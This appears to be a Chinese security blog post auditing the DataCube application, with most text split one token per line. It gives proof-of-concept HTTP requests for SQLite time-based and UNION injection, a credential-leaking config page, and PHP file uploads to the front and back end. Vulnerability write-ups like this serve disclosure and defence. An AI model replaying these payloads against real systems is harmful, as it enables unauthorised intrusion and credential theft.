51工具盒子在这里分享一下通过拖取 DataCube 代码审计后发现的一些漏洞,包括前台的文件上传,信息泄露出账号密码,后台的文件上传。当然还有部分 SQL 注入漏洞,因为 DataCube 采用的是 SQLite 的数据库,所以SQL 注入相对来说显得就很鸡肋。当然可能还有没有发现的漏洞,可以互相讨论。
phpinfo 泄露
SQL注入
无回显的SQL注入
/DataCube/www/admin/setting_schedule.php
SQLite 没有sleep()函数,但是可以用 randomblob(N) 来制造延时。randomblob(N)函数是SQLite数据库中的一个常用函数,它的作用是生成一个指定长度的随机二进制字符串。
正常请求时间
POST
/
admin
/
setting_schedule
.
php
HTTP
/
1.1
Content
-
Type
:
application
/
x
-
www
-
form
-
urlencoded
User
-
Agent
:
Mozilla
/
5.0
(
Windows
NT
10.0
;
Win64
;
x64
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
85.0.4183.83
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,
*/*
;
q
=
0.8
,
application
/
signed
-
exchange
;
v
=
b3
;
q
=
0.9
Connection
:
close
datetime
=
2024
-
0
4
-
24
+
0
2
%
3
A00
'+or+randomblob(9000000000000000000000000)+and+'
1
&
tbl_type
=
fs
&
delete
=
1
延时响应
判断对应的 SQLite 的版本号
POST
/
admin
/
setting_schedule
.
php
HTTP
/
1.1
Content
-
Type
:
application
/
x
-
www
-
form
-
urlencoded
User
-
Agent
:
Mozilla
/
5.0
(
Windows
NT
10.0
;
Win64
;
x64
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
85.0.4183.83
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,
*/*
;
q
=
0.8
,
application
/
signed
-
exchange
;
v
=
b3
;
q
=
0.9
Accept
-
Encoding
:
gzip
,
deflate
Accept
-
Language
:
zh
-
CN
,
zh
;
q
=
0.9
Connection
:
close
datetime
=-
1
'or+(case+when(substr(sqlite_version(),1,1)<'
4
')+then+randomblob(900000000000000000000000000)+else+0+end)+and+'
1
&
tbl_type
=
fs
&
delete
=
1
可以判断出SQLite的版本是3
有回显的SQL注入
POST
/
admin
/
pr_monitor
/
getting_index_data
.
php
HTTP
/
1.1
Content
-
Type
:
application
/
x
-
www
-
form
-
urlencoded
User
-
Agent
:
Mozilla
/
5.0
(
Windows
NT
10.0
;
Win64
;
x64
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
85.0.4183.83
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,
*/*
;
q
=
0.8
,
application
/
signed
-
exchange
;
v
=
b3
;
q
=
0.9
Accept
-
Encoding
:
gzip
,
deflate
Accept
-
Language
:
zh
-
CN
,
zh
;
q
=
0.9
Connection
:
close
req_id
=
1
)
UNION
ALL
SELECT
sqlite_version
(),
NULL
,
NULL
--
查询出 sqlite 的版本号
www\admin\pr_monitor\getting_index_data.php
www\admin\pr_monitor\getting_screen_data.php#getData
www\admin\pr_monitor\getting_screen_data.php#getMonitorItemList
信息泄露
www\admin\config_all.php
将从 SQLite3 数据库中获取的数据转换为一个 JSON 字符串,并输出在页面上
任意文件上传
www\admin\transceiver_schedule.php
POST
/
admin
/
transceiver_schedule
.
php
HTTP
/
1.1
Content
-
Type
:
multipart
/
form
-
data
;
boundary
=----
WebKitFormBoundaryb8tU2iptV70lGozq
User
-
Agent
:
Mozilla
/
5.0
(
Windows
NT
10.0
;
Win64
;
x64
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
85.0.4183.83
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,
*/*
;
q
=
0.8
,
application
/
signed
-
exchange
;
v
=
b3
;
q
=
0.9
Accept
-
Encoding
:
gzip
,
deflate
Accept
-
Language
:
zh
-
CN
,
zh
;
q
=
0.9
Connection
:
close
------
WebKitFormBoundaryb8tU2iptV70lGozq
Content
-
Disposition
:
form
-
data
;
name
=
"upload_file"
;
filename
=
"test1.php"
Content
-
Type
:
application
/
octet
-
stream
<
?
php
phpinfo
();
?
>
------
WebKitFormBoundaryb8tU2iptV70lGozq
Content
-
Disposition
:
form
-
data
;
name
=
"usb_schedule"
1
------
WebKitFormBoundaryb8tU2iptV70lGozq
--
后台任意文件上传
www\admin\setting_photo.php
www\admin\setting_photo.php#insertPhoto
www\admin\images.php
登录后获取参数 accesstime 的值
将值替换到数据包中
POST
/
admin
/
setting_photo
.
php
HTTP
/
1.1
Content
-
Length
:
414
Cache
-
Control
:
max
-
age
=
0
Upgrade
-
Insecure
-
Requests
:
1
Content
-
Type
:
multipart
/
form
-
data
;
boundary
=----
WebKitFormBoundarydzDlRcTHEmG3mohY
User
-
Agent
:
Mozilla
/
5.0
(
Windows
NT
10.0
;
Win64
;
x64
)
AppleWebKit
/
537.36
(
KHTML
,
like
Gecko
)
Chrome
/
85.0.4183.83
Safari
/
537.36
Accept
:
text
/
html
,
application
/
xhtml
+
xml
,
application
/
xml
;
q
=
0.9
,
image
/
avif
,
image
/
webp
,
image
/
apng
,
*/*
;
q
=
0.8
,
application
/
signed
-
exchange
;
v
=
b3
;
q
=
0.9
Accept
-
Encoding
:
gzip
,
deflate
Accept
-
Language
:
zh
-
CN
,
zh
;
q
=
0.9
Connection
:
close
------
WebKitFormBoundarydzDlRcTHEmG3mohY
Content
-
Disposition
:
form
-
data
;
name
=
"add"
1
------
WebKitFormBoundarydzDlRcTHEmG3mohY
Content
-
Disposition
:
form
-
data
;
name
=
"addPhoto"
;
filename
=
"test.php"
Content
-
Type
:
image
/
jpeg
<
?
php
phpinfo
();
?
>
------
WebKitFormBoundarydzDlRcTHEmG3mohY
Content
-
Disposition
:
form
-
data
;
name
=
"accesstime"
0.05027100
1713945976
------
WebKitFormBoundarydzDlRcTHEmG3mohY
--
成功将文件上传到 /images/slideshow/ 目录下
尚未解决的后台SQL注入
类似的注入有很多,但是每一次都进行了 accesstime 的校验,所以需要不停的从页面上获取,这里仅从一处来进行探讨
www\admin\config_time_sync.php
www\admin\Util.class.php#TblConfUpdate
我们很明显的可以看到这里的SQL 语句是我们可控的
首先请求页面 /admin/config_time_sync.php 来获取一个 accesstime 值
再构造请求进行发包
我们将执行的 SQL 语句打印出来
BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.enable';insert into tbl_conf values('ntp.enable', 'true');select randomblob(999900000000000000000000000);select ('1');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.server';insert into tbl_conf values('ntp.server', 're-ene.energia.co.jp');COMMIT;BEGIN EXCLUSIVE;delete from tbl_conf where key = 'ntp.retry_count';insert into tbl_conf values('ntp.retry_count', '5');COMMIT;
这里很奇怪,已经完美的闭合并提示执行成功,却没有执行这条语句,有明白的大佬可以一起讨论一下。
本文作者: dingjiacan@antvsion.com
本文为安全脉搏专栏作者发布,转载请注明: https://www.secpulse.com/archives/205081.html
